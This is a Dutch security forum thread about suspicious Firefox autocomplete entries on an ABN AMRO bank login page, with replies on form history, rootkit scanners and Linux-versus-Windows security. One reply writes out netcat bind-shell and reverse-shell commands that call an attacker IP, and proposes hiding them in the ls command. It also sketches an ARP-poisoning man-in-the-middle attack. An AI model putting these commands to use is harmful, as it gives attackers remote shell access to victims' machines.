Security Professionals - ipfw add deny all from eindgebruikers to any

Verdacht uitklap luikje bij ABN AMRO inlog

29-12-2008, 20:02 door tissatussa, 17 reacties
Vandaag ontdekte ik iets verdachts op mijn computer toen ik inlogde op de website van de ABN AMRO bank. Ik zal beschrijven wat er gebeurde, misschien kan iemand van jullie verheldering brengen.

Inloggen op de website van ABNAMRO gaat als volgt : zie screenshot : http://www.imoma.eu/pubgfx/abnamroselect.png : met je identifier en bankpas kun je van het rode getal de "response code" genereren, deze in het formulierveld over te typen (binnen een minuut ofzo) en zo inloggen. Ook ter bevestiging van een transactie moet dit proces gebeuren. Ik deed het wel vaker. Ditmaal viel het me op dat het history-uitklap-luikje, dat door mijn FireFox (v3.05) browser voor dit formulierveld werd getoond, enkele verdachte entries bevatte : zie screenshot : ik doel niet op de getallen maar op de 3 woorden. Het kan niet direct gevaar, het is slechts (handige) voorkeuze-data, maar ik vond het dus verdacht.

Ik weet : op andere websites kan ook een formulier voorkomen met een veld met hetzelfde name attribute (in dit geval name='response'), waardoor aldaar ingevoerde data waarschijnlijk ook in het history-uitklap-luikje van het ABNAMRO formulierveld te voorschijn zal komen ... Ik kan me echter niet herinneren dat ik zulke wachtwoorden / termen ooit ergens heb ingevoerd ... En mijn laptop liet ik de laatste tijd nooit alleen ... Dit is toch een client side verschijnsel ?

NB. het OS van mijn computer is sinds kort Ubuntu (8.04), dus geen Windows. Hierdoor wordt een groot aantal mogelijke oorzaken beperkt : Ubuntu Linux is van nature veel veiliger dan het Windows OS : virussen, trojans, spyware, etc. komen bij mij niet/nauwelijks voor.
Reacties (17)
30-12-2008, 00:54 door Anoniem
Dat is onzin, hackers / scriptkiddies zijn meer geintresseerd in Windows, omdat het de meest voorkomende besturingssysteem is voor thuisgebruikers. Ik zal zeggen draai een aantal services en binnen notime is er een rootkit op je zogenaamde besturingssysteem waar je zo trots op bent. met een sniffer en MITM aanval hebben ze zo jou veilige SSL verbinding decrypted.

success.. veiligheid bestaat niet ??
30-12-2008, 07:06 door pikah
Door tissatussa
Dit is toch een client side verschijnsel ?

Jup... blijft echter de vraag, wie heeft ze ooit ingetyped of hoe zijn ze er gekomen..
30-12-2008, 10:38 door Anoniem
@anoniem,

Ik denk dat dit onder windows opgaat maar onder Ubuntu/Debian toch wat moeilijker is.
De meeste rootkit worden wel via www-data user geplaats doormiddel van c99 (apache en php) Dus zolang je geen webserver draait maak je de kan heel klein. Tevens zijn er genoeg tools om dit naar te gaan bijv: chkrootkit

En een standaart Ubuntu installatie draai je geen webserver, ssh server, ftp server of mysql server.
Als je een netstat -tulp geeft zie je alleen maar local services die ook alleen maar lokaal benaderbaar zijn.
Of je moet netcat (nc) gaan prutsen dan kan je zo een paar porten open zetten.

@tissatussa

Wat je ziet is een feature van Firefox. IE onder windows heeft het ook.
Het slaat formulier gegevens op. Je moet je er niet te veel van aan trekken want Pikah heeft het goed. Het is een clientside iets.

En als je ubuntu gebruikt moet je even het volgende installeren.
sudo apt-get install chkrootkit

Kan je kijken of er een rootkit op je systeem staat.
Tevens raad ik ook ufw aan dit is de firewall van ubuntu. even googlen en dan kan je zien hoe het werkt.
sudo apt-get install ufw

En je systeem up2date houden. ;)

-Harald
30-12-2008, 10:43 door [Account Verwijderd]
[Verwijderd]
30-12-2008, 13:04 door Anoniem
Nou eerde, speel eens voor helpdesk, hij gebruikt LINUX en firefox dus precies in jouw straatje.
30-12-2008, 13:45 door pikah
Door AnoniemDat is onzin, hackers / scriptkiddies zijn meer geintresseerd in Windows, omdat het de meest voorkomende besturingssysteem is voor thuisgebruikers. Ik zal zeggen draai een aantal services en binnen notime is er een rootkit op je zogenaamde besturingssysteem waar je zo trots op bent. met een sniffer en MITM aanval hebben ze zo jou veilige SSL verbinding decrypted.

success.. veiligheid bestaat niet ??
Volgens mij praat jij beetje klok en klepel, het decrypten van mijn SSL verbinding is voor jou toch niet zo makkelijk als dat je hier probeert te vertellen... wat betreft de interesse door hackers/scriptkiddies in Windows heb je denk ik wel gelijk, maar niet omdat het voor thuisgebruikers is, maar gebruikers in het algemeen.
30-12-2008, 14:39 door [Account Verwijderd]
[Verwijderd]
30-12-2008, 15:03 door Anoniem
@ubuntu gebruiker
ubuntu 'trojan':

sudo netcat -nvv -l -p 80 -e /bin/sh

als je dit in b.v. het commando ls verstopt heb je hem al.
Ohw een firewall blokeert je uitgaand verkeer, dan draaien we hem toch om.

aanvaller: nc -v -l -p 80

in het ls commando verstoppen we:

sudo nc –e /bin/sh [ip aanvaller] 80

Elke keer dat jij ls typt heeft de aanvaller een shell met jou rechten

@pikah

Nee SSL decrypten is niet nodig d.m.v. ARP poisening, MIMA maak je het certificaat op de midle computer aan. Jij denkt dat het echt is (tenzij je je sha-1 hash controleerd) en doet je ding maar je verbinding is nieteens versleuteld dus decrypten is al niet meer nodig.

*gaat back to work*
31-12-2008, 09:51 door Anoniem
@Gisteren, 15:03 door Anoniem

Dit is een leuke PoC maar chkrootkit en andere vissen dit er meteen uit als je het aan ls hangt. tenzij je er een alias van ls van maakt. Maar dan moet je al een shell hebben ;)
Maar het klopt met netcat (nc) kan je dit soort dingen doen.

@Peter V
Ik denk niet dat je de cookies hoeft te verwijderen.
Het volgende werkt ook.

ctrl + shift + del in firefox en dan clear form and search history.
Dit is al voldoende. Als cookies wil bewaren.
31-12-2008, 15:23 door pikah

Nee SSL decrypten is niet nodig d.m.v. ARP poisening, MIMA maak je het certificaat op de midle computer aan. Jij denkt dat het echt is (tenzij je je sha-1 hash controleerd) en doet je ding maar je verbinding is nieteens versleuteld dus decrypten is al niet meer nodig.
Oooh.... ga jij maar lekker ARP poisonen.. succes.. moet je eerst toegang hebben tot mijn netwerk segment.... right..
Lees anders [url=http://en.wikipedia.org/wiki/ARP_poisoning]dit[/url] eens, vooral het stukje "Ethernet"...


sudo nc e /bin/sh [ip aanvaller] 80
Denk je dat dat gaat werken als de user niet in /etc/sudoers staat? of dat NOPASSWD niet is ingevoerd in /etc/sudoers?
Btw.. eerst root-toegang krijgen..


Je doet net alsof het allemaal oooh zo makkelijk is, maar er moet toch heel wat serieus aan de hand zijn wil jij je rootkitje bij mij kwijt kunnen.. en ter info met ARP poisoning gaat het je niet lukken :-)
31-12-2008, 18:19 door Anoniem
Door AnoniemDat is onzin, hackers / scriptkiddies zijn meer geintresseerd in Windows, omdat het de meest voorkomende besturingssysteem is voor thuisgebruikers. Ik zal zeggen draai een aantal services en binnen notime is er een rootkit op je zogenaamde besturingssysteem waar je zo trots op bent. met een sniffer en MITM aanval hebben ze zo jou veilige SSL verbinding decrypted.

success.. veiligheid bestaat niet ??


Juist omdat Windows het meest verkomende O.S. Is richten hackers c.q. crackers zich op dit O.S., en juist daarom is het Linux O.S. ook veiliger. Onder Ubuntu Linux en andere distro's ben je dus wel veiliger. Wil je al malware [ in het ruimste woord van de zin gaan schrijven ] dan dien je ook nog te weten welke distro iemand heeft draaien, want niet elke distro is hetzelfde.
Zou je bijvoorbeeld de pakketmanager willen uitschakelen onder PCLinuxO.S. dan moet je een applicatie schrijven die Synaptic uitschakeld, onder Pardus Linux is dit PiSi, en onder Open Suse is dit weer Yast. Zo zie je dus maar weer dat het onder Linux een stuk moeilijker word
om iemand te besmetten met bijvoorbeeld een virus, of andere malware. De meeste mensen gebruiken nog steeds Windows XP, of Vista, dus is het voor de crackers een heel stuk makkelijker om deze groep te doen proberen te besmetten. En zolang Windows het meest gebruikte O.S. Blijft zal Linux dus steeds veiliger blijven.


Ook dit geld weer voor een rootkit, en dan moet je ook nog het root wachtwoord weten.
Ben je zo dom en run je zomaar alles, dan ligt dit toch echt een jezelf, en dat geld ook onder Windows. Verder zal het ook een rootkit moeten zijn voor Linux, want Windows appz werken niet onder Linux tenzij je ze draait onder Wine, en dan is het ook nog maar de vraag of ze lopen. Tot voor een jaar terug was ik ook een echte Windows Freak die niet wilde omschakelen
maar na het proberen van een aantal Live Boot CD's, heb ik toch maar een Linux op een 2de pc geinstalleerd. Nu pas zie ik wat een super heerlijk O.S. Linux is. Het zit beter in elkaar, word
beter gecontroleerd omdat het open-source is, stabieler, is, kan meer, en je hoeft je geen zorgen te maken over malware in de ruimste woord van de zin. Ook hoef je niet steeds te rebooten zoals bij Windows na het updaten van je O.S. Als ik dan ook nog eens luister naar de podcast van de beveiligingsupdate.nl, en hoor dat Windows vaak patches die critical zijn pas na twee weken vrijgeeft dan vraag ik me toch echt af, waar ze mee bezig zijn. Bij Windows komt beveiliging dus niet op de eerste plaats, en maakt ze afhankelijk, [ onbeveiligd ] tot zij
eens met patches uitkomen, dus een maal op de twee weken.

Nu Linux een beetje begint op te komen, geen geld kost, en ook nog gebruiks vriendelijk is is het nog maar de vraag, hoelang Microsoft nog aan de top blijft met hun onveilig O.S. Kijk maar eens naar de armere landen waar 2de hans pc's naar worden verscheept, op de meeste pc's draait Linux, omdat het niks kost, en veiliger is, maar werk je een tijdje met Linux, die zie je vanzelf dat sommige dingen logischer in elkaar steken dan onder Windows. En daarnaast kan
Linux ook nog eens veel meer. De meeste servers op internet lopen ook nog eens op een Linux
O.S. , en dat is allemaal niet zomaar.

Een hele leuke distro voor de mensen is bijvoorbeeld Pardus Linux.
Waar alles al in zit, en een Nederlands talig forum heeft, ook hebben ze een live boot cd
waarmee je eerst kan spelen om eens te zien, wat Linux allemaal kan en precies is.

http://www.pardus-linux.nl/


Wil je eerst de Live Boot CD eens proberen klik dan op onderstaande link :
ftp://ftp.pardus.org.tr/pub/pardus/livecd/2008.1/Pardus_Calisan_2008.1-KDE3_Hyaena_hyaena.iso

P.S. Booten houd in dat het hele O.S. Loopt vanaf cd-rom, je komt dus niet aan je eigen
Windows systeem, dus veilig. Mocht de cd niet booten vanaf cd-rom dan kun je dit in het bios
veranderen. Lukt het niet , of durf je niet in het bios een instelling te veranderen, vraag het dan hier, of op het Pardus-forum, of kijk in het boekje van de moederbord.

Onderstaande link is de installatie cd: LET OP dit is een .iso file !!!
ftp://ftp.pardus.org.tr/pub/pardus/kurulan/2008.1/Pardus_2008.1_Hyaena_hyaena_[Int].iso


LET OP, na het booten druk je op de F2 toets , en selecteert daar voor Nederlands, dan
is het hele O.S. gelijk in het Nederlands. Voor meer hulp registeer je even op het forum.
http://forum.pardus-linux.nl/

Om tot een slot te komen, wil je het een poging geven, en probeer je het ook serieus uit,
dan zal je na een aantal maanden vanzelf zien, hoe onveilig je was met Windows.

Niet geschoten is altijd mis.

Enkel de verkenner structuur is onder Linux iets anders maar dat heb je zo onder de knie.
Probeer maar eens eerst de Live Boot CD uit, zou ik zeggen, en vraag wat je niet weet op het
Pardus forum.


Veel succes, en doen hoor.
Op naar een veiliger 2009 allemaal !!!!!!!!

Voor straks wens ik iedereen nog een gezond en gelukkig 2009,
31-12-2008, 19:18 door Anoniem
Door pikah

Nee SSL decrypten is niet nodig d.m.v. ARP poisening, MIMA maak je het certificaat op de midle computer aan. Jij denkt dat het echt is (tenzij je je sha-1 hash controleerd) en doet je ding maar je verbinding is nieteens versleuteld dus decrypten is al niet meer nodig.


ARP Poisening werkt niet via internet, omdat het een Niet-routeerbaar protocol is.
02-01-2009, 21:34 door tissatussa
Door Anoniem@Gisteren, 15:03 door Anoniem

@Peter V
Ik denk niet dat je de cookies hoeft te verwijderen.
Het volgende werkt ook.

ctrl + shift + del in firefox en dan clear form and search history.
Dit is al voldoende. Als cookies wil bewaren.

Deed ik, en het werkt (natuurlijk) : alle voorkeuzes van het selectie-luikje zijn weg. Daarmee zal ik niet weten waar die verdachte entries vandaan kwamen, maar goed ...

De UFW firewall installeerde ik. Ook deed ik een scan met zowel chkrootkit als rkhunter : niets gevonden, OK dus.
Allemaal bedankt. Door al jullie reactes leerde ik in de tussentijd nog meer bij !
30-01-2009, 13:54 door Anoniem
Zou het niet kunnen dat je die entries ooit op een andere site ingetypt hebt als oplossing van een captcha?
01-02-2009, 23:09 door Anoniem
En ik maar denken dat Windows veilig was ? Ik gebruik al jaren windows, soms met problemen met popups, maar dacht verder dat het veilig was. raden jullie mij aan over te stappen op ubuntu ?
02-02-2009, 21:21 door Anoniem
Door AnoniemEn ik maar denken dat Windows veilig was ? Ik gebruik al jaren windows, soms met problemen met popups, maar dacht verder dat het veilig was. raden jullie mij aan over te stappen op ubuntu ?

Of Mac?
04-02-2009, 17:37 door [Account Verwijderd]
[Verwijderd]
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.